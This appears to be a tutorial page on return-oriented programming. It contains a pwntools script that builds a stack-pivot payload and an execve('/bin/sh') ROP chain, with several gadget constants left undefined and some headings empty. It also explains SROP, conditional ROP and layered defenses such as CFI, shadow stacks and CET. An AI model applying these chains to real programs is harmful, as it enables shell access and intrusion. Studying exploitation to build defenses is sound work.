35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/env python3
"""
Stack Pivot ROP Technique
When overflow buffer is small, pivot stack to larger controlled region
"""
 
from pwn import *
 
def p64(value):
    return struct.pack("<Q", value)
 
# Scenario: We can overflow 32 bytes but need 200-byte ROP chain
# Solution: Write full chain elsewhere, pivot stack there
 
SMALL_OVERFLOW = 32
OFFSET_TO_RET = 24  # Only room for 24 bytes padding + one address
 
# Gadgets
LEAVE_RET = 0x401234         # leave; ret (mov rsp, rbp; pop rbp; ret)
POP_RBP_RET = 0x401236       # pop rbp; ret
 
# Address where we've written our full ROP chain
# (via environment variable, heap, secondary buffer, etc.)
PIVOT_TARGET = 0x7fffffffe000  # Stack address containing full chain
 
def build_pivot_payload():
    """
    Small payload that pivots stack to PIVOT_TARGET
    
    leave; ret does:
      mov rsp, rbp    ; RSP = RBP (we control RBP via overflow)
      pop rbp         ; Pop from new stack location
      ret             ; Return from new stack location
    
    So we set RBP to point to our full chain - 8
    """
    payload = b""
    payload += b"A" * OFFSET_TO_RET
    
    # Overwrite saved RBP with (PIVOT_TARGET - 8)
    # After leave: RSP = RBP, then pop rbp consumes 8 bytes
    # Then ret reads from RSP = PIVOT_TARGET
    payload += p64(PIVOT_TARGET - 8)  # New RBP value
    
    # Overwrite return address with leave; ret gadget
    payload += p64(LEAVE_RET)
    
    return payload
 
# The full ROP chain that lives at PIVOT_TARGET
def build_full_chain():
    """Full ROP chain for execve, stored at PIVOT_TARGET"""
    chain = b""
    chain += p64(0xdeadbeef)          # Dummy value popped into RBP by leave
    chain += p64(POP_RDI_RET)         # pop rdi; ret
    chain += p64(BIN_SH_ADDR)         # "/bin/sh"
    chain += p64(POP_RSI_RET)         # pop rsi; ret
    chain += p64(0)                   # NULL
    chain += p64(POP_RDX_RET)         # pop rdx; ret
    chain += p64(0)                   # NULL
    chain += p64(POP_RAX_RET)         # pop rax; ret
    chain += p64(59)                  # execve
    chain += p64(SYSCALL)             # syscall
    return chain
 
# Usage:
# 1. Place full_chain at PIVOT_TARGET (via other means)
# 2. Use small pivot_payload in vulnerable overflow
# 3. Execution pivots to full_chain, executes complete ROP
 
print("=== Stack Pivot Payload ===")
print(f"Pivot payload size: {len(build_pivot_payload())} bytes")
print(f"Full chain size: {len(build_full_chain())} bytes")
print(f"Stack pivots to: {hex(PIVOT_TARGET)}")

Sigreturn-Oriented Programming (SROP)

This is particularly powerful because you only need a single gadget: syscall with RAX=15 (sigreturn). The fake frame provides all register values.

SROP in Practice

ROP and Turing Completeness

Minimum Gadget Sets for Turing Completeness:

To achieve Turing completeness, a gadget catalog needs:

Loading constants — Move values from stack to registers
Arithmetic operations — At minimum, addition and negation (for subtraction)
Logical operations — AND, OR, XOR, NOT
Memory access — Load from and store to arbitrary addresses
Flow control — Conditional execution (can be simulated with memory tricks)

Minimal Gadget Set for Turing Completeness
Operation	Example Gadget	Provides
Load immediate	`pop rax; ret`	Constants from stack to register
Move	`mov rax, rbx; ret`	Data movement between registers
Add	`add rax, rbx; ret`	Arithmetic capability
Memory load	`mov rax, [rbx]; ret`	Read arbitrary memory
Memory store	`mov [rax], rbx; ret`	Write arbitrary memory
Conditional	`cmp;cmovz; ret`	Branching (or use indirect dispatch)
Indirect jump	`jmp [rax]` or computed ret	Dynamic control flow

Practical Implications:

Arbitrary payloads without new code: Entire malware (if somehow expressed) could be a ROP chain
Evasion of code-based detection: No shellcode bytes to signature-match
Defense complexity: You cannot simply 'block new code execution'—the attacker uses your own code
Attackers rarely need full Turing completeness: In practice, calling system() or execve() suffices

Conditional Execution in ROP

True conditionals in ROP are challenging because RET always pops the next address—there's no je equivalent. Techniques include:

Conditional memory writes: Write different addresses to jump table locations
CMOV gadgets: Conditionally move addresses to stack locations
Self-modifying chains: Update chain in memory based on conditions
Indirect dispatch: Load jump target from memory, where value depends on condition

JOP and COP

Defenses Against ROP

ROP's power prompted significant research into defenses. No single defense is comprehensive, but layering multiple mitigations significantly raises the exploitation bar.

ROP Mitigation Strategies

•ASLR (Address Space Layout Randomization) — Randomize where code is loaded. Attacker doesn't know gadget addresses. Bypass: info leak to discover base address.
•Stack Canaries — Detect overflow before return. Doesn't prevent ROP directly but makes triggering it harder. Bypass: leak canary, avoid canary with different vuln.
•Shadow Stacks — Maintain separate stack for return addresses; verify return destination matches. Highly effective but has runtime cost.
•Control Flow Integrity (CFI) — Verify that indirect jumps/calls/returns go to valid targets. Restricts available gadgets significantly.
•CET (Intel Control-flow Enforcement) — Hardware-based shadow stack. Very low overhead. Newer CPUs only.
•Compiler-based transformations — Eliminate or reduce gadgets during compilation (e.g., G-Free, return-less binaries).

Effective Defenses

•Shadow stacks + CET (high assurance)
•Fine-grained CFI (Microsoft CFG)
•Strong ASLR (no info leaks)
•Memory-safe languages (Rust)

Bypassable Defenses

•Coarse-grained CFI (limited target sets)
•ASLR without info leak prevention
•Stack canaries alone
•ROP-detection heuristics

Control Flow Integrity (CFI) in Detail

CFI restricts where indirect control transfers can go:

Forward-edge CFI: Restricts indirect calls/jumps to valid function entry points
Backward-edge CFI: Restricts returns to valid return sites (shadow stacks implement this)

Defense in Depth

Summary: Mastering Return-Oriented Programming

We've explored Return-Oriented Programming—the technique that transformed exploitation after DEP. Let's consolidate the key insights.

Key Takeaways

•ROP chains existing code fragments (gadgets) — Each gadget ends in RET, transferring control to the next gadget address on the stack.
•Gadgets are found in legitimate binaries — No new code is injected; ROP uses what's already there, defeating DEP.
•The stack becomes a program — Carefully arranged addresses and values on the stack control execution flow.
•Automated tools find gadgets — ROPgadget, Ropper, and pwntools automate the tedious work of gadget discovery and chain construction.
•Advanced techniques extend ROP's reach — Stack pivoting, SROP, and ret2dl-resolve handle complex scenarios.
•ROP is Turing-complete — Given sufficient gadgets, any computation is possible without injected code.
•Defense requires layered mitigations — CFI, shadow stacks, and CET significantly constrain ROP, though no single defense is complete.

What's Next: Prevention Techniques

Page Complete

4 / 5